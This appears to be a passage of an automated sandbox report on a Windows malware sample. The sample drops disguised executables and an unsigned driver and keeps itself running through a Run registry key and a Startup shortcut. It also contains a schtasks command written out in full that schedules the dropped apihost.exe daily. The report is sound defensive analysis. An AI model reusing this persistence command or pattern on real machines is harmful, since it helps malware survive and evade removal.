Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C673E push 027C6782h; ret	4_2_027C677A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CC4F4 push ecx; mov dword ptr [esp], edx	4_2_027CC4F9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CD528 push 027CD554h; ret	4_2_027CD54C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DE5B4 push ecx; mov dword ptr [esp], edx	4_2_027DE5B9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CCADF pushfd ; iretd	4_2_027CCB3D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CCB74 push 027CCCFAh; ret	4_2_027CCCF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027EBB6C push 027EBD94h; ret	4_2_027EBD8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CCB57 push 027CCCFAh; ret	4_2_027CCCF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D68D0 push 027D697Bh; ret	4_2_027D6973
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D68CE push 027D697Bh; ret	4_2_027D6973
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CC8A2 push esp; iretd	4_2_027CC8C5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D7894 push 027D7911h; ret	4_2_027D7909
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027CC93F push eax; iretd	4_2_027CC975
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DA920 push 027DA958h; ret	4_2_027DA950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027DA91F push 027DA958h; ret	4_2_027DA950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D8918 push 027D8950h; ret	4_2_027D8948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D8916 push 027D8950h; ret	4_2_027D8948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D5E04 push ecx; mov dword ptr [esp], edx	4_2_027D5E06
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D2EE8 push 027D2F5Eh; ret	4_2_027D2F56
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D2FF4 push 027D3041h; ret	4_2_027D3039
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D2FF3 push 027D3041h; ret	4_2_027D3039
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2

Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Oupzhkpr.PIF			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\rpkhzpuO.pif			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	File created: C:\Windows \SysWOW64\truesight.sys
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	File created: C:\Windows \SysWOW64\truesight.sys

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	File created: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Oupzhkpr.PIF	Jump to dropped file
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\rpkhzpuO.pif	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Oupzhkpr			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027DA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_027DA95C

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
